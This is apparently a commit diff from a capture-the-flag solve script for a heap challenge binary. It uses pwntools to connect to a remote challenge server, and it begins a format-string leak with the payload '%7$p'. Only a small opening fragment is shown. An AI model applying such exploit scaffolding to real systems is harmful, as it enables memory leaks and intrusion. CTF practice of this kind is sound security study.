solve script
This commit is contained in:
@@ -1,7 +1,6 @@
|
||||
#!/usr/bin/python3
|
||||
|
||||
from pwn import *
|
||||
import time
|
||||
|
||||
context.binary = target = ELF("./heaps_dont_lie", checksec=False)
|
||||
# r = process()
|
||||
@@ -9,7 +8,6 @@ r = remote("94.72.112.248", 1244)
|
||||
|
||||
# funcs
|
||||
s = lambda a: r.sendline(a)
|
||||
ss = lambda a: r.send(a)
|
||||
|
||||
# leak
|
||||
buf = b"%7$p"
|
||||
|
||||
Reference in New Issue
Block a user